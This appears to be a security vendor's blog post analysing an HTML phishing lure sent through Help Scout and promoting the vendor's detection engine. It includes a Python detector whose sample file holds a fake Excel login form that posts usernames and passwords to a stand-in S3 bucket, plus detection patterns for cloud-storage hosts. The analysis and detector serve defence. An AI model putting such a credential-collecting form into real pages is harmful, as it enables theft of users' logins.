In an era where customer support SaaS platforms like Help Scout and Zendesk have long been integral to business operations, these apps have also become prime targets for threat actors, often delivered via the enterprise browser.
The inherent trust users have in these tools, combined with the high volume of data exchange, makes them attractive vectors for advanced phishing and malware attempts. In this blog, we’ll dissect a highly evasive targeted phishing attack coming in through the Help Scout web application.
Attack Overview and Execution
This attack leveraged the enterprise browser, targeting Help Scout – a popular customer communication and ticketing system. Help Scout streamlines support by centralizing customer requests into tickets, making it a critical touchpoint for support agents. The phishing attempt involved an HTML file named “INVOICE.html” delivered through this system. To the targeted support agent, this file would appear as a regular support ticket, possibly containing a customer request or invoice details. However, it was cleverly designed to appear as if it originated from a secure URL, thereby evading standard browser security checks.
Help Scout, the ticketing platform used by the targeted user. Source: https://www.helpscout.com/
- Malicious File Transmission: The HTML file containing malicious content was sent to the target user, bypassing initial web security checks by disguising its origin.
- Exploitation of Cloud Services: The attacker’s strategy included the use of AWS S3 Buckets to store the malicious HTML and JavaScript files. This setup facilitated a redirection scheme, funneling POST requests to a URL likely connected to the attacker’s own AWS bucket. The primary objective was to capture and store compromised credentials, with the fake login form mimicking Microsoft Excel and even pre-injecting the specific target’s username.
The phishing form impersonating Microsoft Excel
Evasive Maneuvers and Technical Prowess
The sophistication of this HTML-based phishing was further exemplified by the evasive maneuvers employed by the threat actor:
- Evasion via Inaccessible Script Paths: The attacker embedded scripts from paths that were inaccessible when viewed as a standalone document, a tactic aimed at circumventing security systems like Secure Web Gateways and Firewalls that scan file content for threats.
- Response Code Manipulation: Despite these evasion tactics, when the scripts were requested directly via the URL linked to the compromised credentials, they responded with a 200 status code. This “success” signal indicated working communication with the attacker’s infrastructure and suggested that the evasion was partly designed to hide the server response from standard security checks.
The attacker inserted code from another path that is not accessible when the document is opened as a standalone HTML file
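The indicators described in the two sections above (script references that cannot be resolved when the attachment is opened on its own, scripts and a credential-collecting POST target hosted on cloud storage, and a username pre-filled into the form) can be checked statically before a file is ever rendered. The following is an added example written for this post, not Perception Point's engine and not code from the attack; the sample HTML, the bucket hostname `example-bucket` and the agent address are constructed stand-ins, and the cloud-storage suffix list and the two-indicator threshold are assumptions of the example.

```python
"""Static triage of an HTML attachment for the phishing indicators discussed above."""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample modelled on the described lure; not the real INVOICE.html.
SAMPLE_HTML = """<!DOCTYPE html>
<html><head><title>INVOICE</title>
<script src="/static/js/loader.js"></script>
<script src="https://example-bucket.s3.amazonaws.com/assets/app.js"></script>
</head><body>
<form id="login" method="POST" action="https://example-bucket.s3.amazonaws.com/collect">
  <input type="email" name="username" value="agent@example.com">
  <input type="password" name="password">
  <button type="submit">Open document</button>
</form>
</body></html>"""

# Assumed list of object-storage host suffixes worth a second look when a
# detached HTML file loads code from or posts credentials to them.
CLOUD_STORAGE_HOSTS = (".s3.amazonaws.com", "storage.googleapis.com", "blob.core.windows.net")


class IndicatorExtractor(HTMLParser):
    """Collects script sources, forms and pre-filled identity values."""

    def __init__(self):
        super().__init__()
        self.scripts = []    # every <script src=...>
        self.forms = []      # {"method": ..., "action": ...} per <form>
        self.prefilled = []  # input values that look like a user identity

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)  # html.parser lowercases tag and attribute names
        if tag == "script" and a.get("src"):
            self.scripts.append(a["src"])
        elif tag == "form":
            self.forms.append({
                "method": (a.get("method") or "get").lower(),
                "action": a.get("action") or "",
            })
        elif tag == "input":
            value = a.get("value") or ""
            kind = (a.get("type") or "").lower()
            if "@" in value and kind in ("email", "text", ""):
                self.prefilled.append(value)


def analyze(html_text):
    """Return a list of (indicator, evidence) tuples found in the document."""
    parser = IndicatorExtractor()
    parser.feed(html_text)
    findings = []
    for src in parser.scripts:
        url = urlparse(src)
        if not url.netloc:
            # A path-only src has no origin to resolve against when the file is
            # opened from disk, so scanners that render it standalone see nothing.
            findings.append(("script_src_unresolvable_standalone", src))
        elif url.netloc.endswith(CLOUD_STORAGE_HOSTS):
            findings.append(("script_src_cloud_storage", src))
    for form in parser.forms:
        action = urlparse(form["action"])
        if form["method"] == "post" and action.netloc:
            # Credentials typed into a local file are sent to a remote host.
            findings.append(("form_posts_to_external_host", form["action"]))
    for value in parser.prefilled:
        findings.append(("prefilled_username", value))
    return findings


def triage(html_text, threshold=2):
    """Summarise findings; 'suspicious' when at least `threshold` distinct indicators fire."""
    findings = analyze(html_text)
    kinds = sorted({kind for kind, _ in findings})
    return {"findings": findings, "kinds": kinds, "suspicious": len(kinds) >= threshold}


if __name__ == "__main__":
    for kind, evidence in analyze(SAMPLE_HTML):
        print(f"{kind:40s} {evidence}")
    print("suspicious:", triage(SAMPLE_HTML)["suspicious"])
```

The unresolvable-path check deliberately fires on any root-relative `src`; on a page served from a web origin that is normal, but in an attachment opened from disk or from a ticketing system's download link it means the file only "works" at the attacker's hosting URL, which is exactly the behaviour the post describes. Running this over attachments at the gateway or browser download point gives a cheap first-pass signal to combine with rendering-based analysis.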
Detection and Neutralization: Advanced Browser Security in Action
When the user downloads the file from Help Scout, Perception Point’s advanced detection engines, featuring proprietary ML algorithms, kick into action. The system’s intricate design, inspired by the human immune system, allows for a comprehensive analysis of the HTML code. Dubbed MAPR (Maliciously Associated Pattern Recognizer), this detection engine utilizes a biomimicry approach, akin to pattern recognition receptors in human biology, to detect DNA anomalies.
The prevented phishing attack on Perception Point’s XRay console (10 seconds scanning time)
Perception Point’s groundbreaking MAPR employs a trio of detection agents—Leaf, Brackets, and Concatenate Tags—to dissect and analyze every facet of the HTML file. From scrutinizing each leaf node in the code’s tree structure to monitoring patterns within brackets and concatenating HTML tags with their attributes, MAPR ensures a comprehensive inspection. This AI-driven, bio-inspired approach not only identifies but also adapts to new threats, providing a robust defense against sophisticated phishing attempts delivered via HTML files.